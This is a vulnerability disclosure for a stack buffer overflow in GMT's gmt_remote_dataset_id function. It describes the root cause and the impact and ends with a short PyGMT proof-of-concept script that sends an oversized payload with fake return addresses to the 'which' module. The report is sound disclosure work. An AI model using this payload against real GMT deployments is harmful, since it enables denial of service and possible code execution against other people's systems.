Summary

A stack-based buffer overflow vulnerability was identified in the gmt_remote_dataset_id function within src/gmt_remote.c. This issue occurs when a specially crafted long string is passed as a dataset identifier (e.g., via the which module), leading to a crash or potential arbitrary code execution.

Details

The vulnerability is caused by the unsafe use of strcpy (or similar unbounded string operations) when copying a user-controlled dataset name into a fixed-size stack buffer file[PATH_MAX].

• Vulnerable Function: gmt_remote_dataset_id
• Vulnerable File: src/gmt_remote.c
• Root Cause: Lack of input length validation before copying to a stack buffer.

When an input exceeds PATH_MAX (typically 4096 bytes), it overwrites the stack frame, including the return address. This was confirmed using AddressSanitizer (ASan), which reported a stack-buffer-overflow.

PoC

The following Python script using PyGMT reproduces the crash:

import struct
from pygmt.clib import Session

with Session() as lib:
    # Payload designed to overflow the stack buffer
    padding = "A" * 4096
    fake_ret = struct.pack("<Q", 0x4141414141414141) * 100
    payload = padding + fake_ret.decode("latin-1")
    
    # Trigger the overflow via the 'which' module
    lib.call_module("which", [payload])

Impact

This is a memory safety vulnerability.

• Who is impacted: Any user or application using GMT via the C API or higher-level interfaces like PyGMT that processes untrusted dataset names.
• Consequences: At minimum, it causes a Denial of Service (DoS) via program crash. In certain environments, it could potentially be exploited for arbitrary code execution.